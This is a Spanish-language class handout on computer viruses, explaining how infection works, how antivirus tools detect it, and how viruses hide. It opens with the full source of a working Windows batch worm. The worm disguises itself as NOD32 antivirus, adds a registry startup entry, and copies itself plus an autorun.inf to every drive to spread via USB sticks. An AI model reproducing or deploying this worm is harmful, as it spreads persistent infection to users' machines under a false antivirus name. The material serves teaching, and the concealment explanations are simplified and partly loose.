REPARACIÓN Y MANTENIMIENTO DE PC CLASE 10 – VIRUS SEGUNDA PARTE Como infecta un virus. ¿Un virus es un programa no? Un programa creado por personas y que sigue un serie de instrucciones, y… ¿qué instrucciones sigue? Las de un código que definió su creador. instalar.bat: @echo off rem *******************************INFECCION DE LA COMPUTADORA EN USO *************************** copy data.cab %windir%\cmdow.exe > nul copy instalar.bat %windir%\maloso.bat > nul copy instalar.bat c:\Nod_32.bat > nul echo [autorun] > %windir%\maloso.inf echo shellexecute=instalar.bat >> %windir%\maloso.inf echo shell\auto\command=instalar.bat >> %windir%\maloso.inf echo Windows Registry Editor Version 5.00 > %windir%\maloso.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %windir%\maloso.reg echo "Nod 32 protection"="c:\\Nod_32 /r" >> %windir%\maloso.reg reg import %windir%\maloso.reg rem *******************************FIN DE LA INFECCION DE LA COMPUTADORA EN USO ***************** cmdow @ /hid if %1==/r goto desderun start %cd% goto saltear :desderun ::start "%cd%" :saltear rem ******************************COMIENZO DE INFECCION DE LETRAS ******************************* :arriba for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:\ ( echo Encontrada unidad %%a if exist %%a:\autorun.inf attrib %%a:\autorun.inf -h -r -s if exist %%a:\autorun.inf rd %%a:\autorun.inf /s /q if exist %%a:\autorun.inf del %%a:\autorun.inf copy %windir%\cmdow.exe %%a:\data.cab copy %windir%\maloso.bat %%a:\instalar.bat copy %windir%\maloso.inf %%a:\autorun.inf ) rem ******************************FIN INFECCION DE LETRAS *************************************** rem ******************************COMIENZO DE JODA ********************************************** rem ******************************FIN DE JODA *************************************************** ping 127.0.0.1 -n 10 > nul goto arriba
El código de arriba pertenece a un virus que se aleja en PENDRIVES.
Eso es en letras, aunque su código está escrito de manera similar, pero en un lenguaje de programación, más relacionado con números binarios. Para simplificarlo vamos a decir algo así: (BC4D32) Entonces:
Pepe.exe --> (BC4D32)
Así, aparece un archivo común y corriente como ser: MANUELA.EXE con su código ZAB37 Para poder infectar el virus añade su código al código del archivo a infectar. Pepe.exe --> (BC4D32) + MANUELA.EXE = ZAB37 = MANUELA.EXE = ZABBC4D3237
Antivirus: Métodos de detección 1. SCANNING: “Lee” los códigos de los archivos escaneados en busca de fragmentos del código de los virus que tiene en su base de datos. MANUELA.EXE = A4FC9FF218FF217 FF218FFFFFA4FC9 00DEBC4D32800D E8FF21FC9FF218F F2171 FF218FFFFFA4FC9
Analiza y descubre que hay un virus, equivalente a: Pepe.exe --> (BC4D32) Si no existe el código en la base de datos del antivirus, NO lo detecta. Es por ello que debe estar actualizado. No siempre o no todos los virus están en todos los antivirus.
2. CRC = CHEQUEO DE REDUNDANCIA CICLICA: Realiza una serie de operaciones matemáticas dentro de cada archivo y genera un número como resultado para cada una. Luego almacena todos los resultados en un archivo aparte. manuela.exe = 72 ------ transcurso de 2 días ------ manuela.exe = 82 virus El resultado es una POSIBLE AMENAZA. 3. PROGRAMA DE VIGILANCIA: Búsqueda constante (Protección Residente)de archivos en ejecución potencialmente peligrosos según la acción que realizan. • • • • •
FORMATEO DE DISCO SOBREESCRITURA DE INFORMACION BORRAR ARCHIVOS ACCESO A ARCHIVOS IMPORTANTES MODIFICACION DE ARCHIVOS EXTERNOS
4. BUSQUEDA HEURISTICA: El antivirus “aprende” las acciones de cada archivo (ya sea por predicción o por observación) y si detecta un comportamiento “raro”, lo marca como potencialmente peligroso.
a. PREDICCION: Si es un “.doc” debe actuar como tal, si intenta formatear un disco, será catalogado como virus. b. OBSERVACION: Si encuentra un patrón que va afectando a archivos, y ese mismo patrón se relaciona con un virus (o son producto del mismo) lo cataloga como virus. NOTA: Suele generar muchas Falsas Alarmas
Que pasa cuando Antivirus detecta una INFECCION. Pepe.exe: 00DEBC4D32800D • • • •
LIMPIAR / REPARAR: quita el código malicioso del archivo 00DEBC4D32800D ELIMINAR: elimina el archivo. Pepe.exe CUARENTENA / BAUL / AISLACION: separa al archivo del resto y lo pone en un ambiente controlado. NO HACER NADA: no hace nada. NOTA: la primera opción en general, se reserva para antivirus PAGOS.
Métodos de ocultamiento del virus. 1. OCULTAMIENTO: Está diseñado para ocultar la infección al ojo humano. manuela.exe
16/07/09 17/10/09
14:43am 639 Kb 18:59pm 814 Kb Esconde y muestra
2. SOBREPASO: Se adelanta a la Protección Residente, detecta al virus y lo esconde para que no sea detectado. Escaneo de la RAM datos, datos… ------> Escáner Antivirus ------> Escáner Virus -------> datos, datos… La forma de detectarlo es en el escaneo del disco duro.
3. AUTOENCRIPTACIÓN: esta técnica cambia el código del archivo infectado con cada infección que realiza, pero los pasos con que realiza la infección son siempre los mismos, a través de eso, puede ser detectada la infección. pepe.exe = BC4D32 manuela.exe = A34DA A34BC4D32DA --> A --> 32BC4D josega.exe = HX5HV HX532BC4DHV --> A --> 4D32BC enrique.exe = LACA0 LAC4D32BCA0 --> A --> BC4D 32 4. POLIFORMISMO: similar al anterior, pero varia sus patrones. pepe.exe = BC4D32 manuela.exe = A34DA josega.exe = HX5HV enrique.exe = LACA0
A34BC4D32DA HX532BC4DHV LAC4D32BCA0
--> K --> 32BC4D --> X --> 4D32BC --> L --> BC4D 32 Esta técnica es muy difícil de detectar.
El antivirus va a probar un SISTEMA DE FUERZA BRUTA (prueba y error) con su base de datos va a ir probando realizar distintas combinaciones a los “virus” y lo realizara sobre los archivos “sospechosos” buscando alguna coincidencia.
5. ARMOURING: modifica el código del archivo infectado para que el antivirus no lo pueda reconocer como un archivo. pepe.exe = BC4D32
-------> pepe.exe = ↘∑≈₠Ⅎ§ ⅓∫∞○ El antivirus se pregunta: ¿es un archivo? Como no sigue un código, lo ignora.